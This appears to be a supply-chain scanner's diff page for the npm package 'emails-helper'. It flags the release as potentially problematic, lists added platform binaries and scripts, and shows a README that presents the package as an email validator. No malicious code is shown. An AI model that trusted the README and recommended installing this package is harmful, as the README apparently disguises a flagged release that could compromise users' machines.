emails-helper 0.0.1-security → 2.0.20230824114134
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of emails-helper might be problematic. Click here for more details.
- package/README.md +15 -3
- package/binaries/darwind.txt +1 -0
- package/binaries/darwinh.txt +1 -0
- package/binaries/linuxd.txt +1 -0
- package/binaries/linuxh.txt +1 -0
- package/binaries/win32d.exe.txt +1 -0
- package/binaries/win32h.exe.txt +1 -0
- package/index.js +31 -0
- package/init.js +1 -0
- package/package.json +10 -4
package/README.md
CHANGED
@@ -1,5 +1,17 @@
|
|
1
|
-
#
|
1
|
+
# emails-helper
|
2
2
|
|
3
|
-
|
3
|
+
A javascript library to validate email address against different formats.
|
4
4
|
|
5
|
-
|
5
|
+
## Installation
|
6
|
+
|
7
|
+
```bash
|
8
|
+
npm install emails-helper
|
9
|
+
```
|
10
|
+
|
11
|
+
## Usage
|
12
|
+
|
13
|
+
```javascript
|
14
|
+
var validator = require("emails-helper");
|
15
|
+
validator.validate("test@email.com"); // true
|
16
|
+
validator.validate("test@@email.com"); // false
|
17
|
+
```
|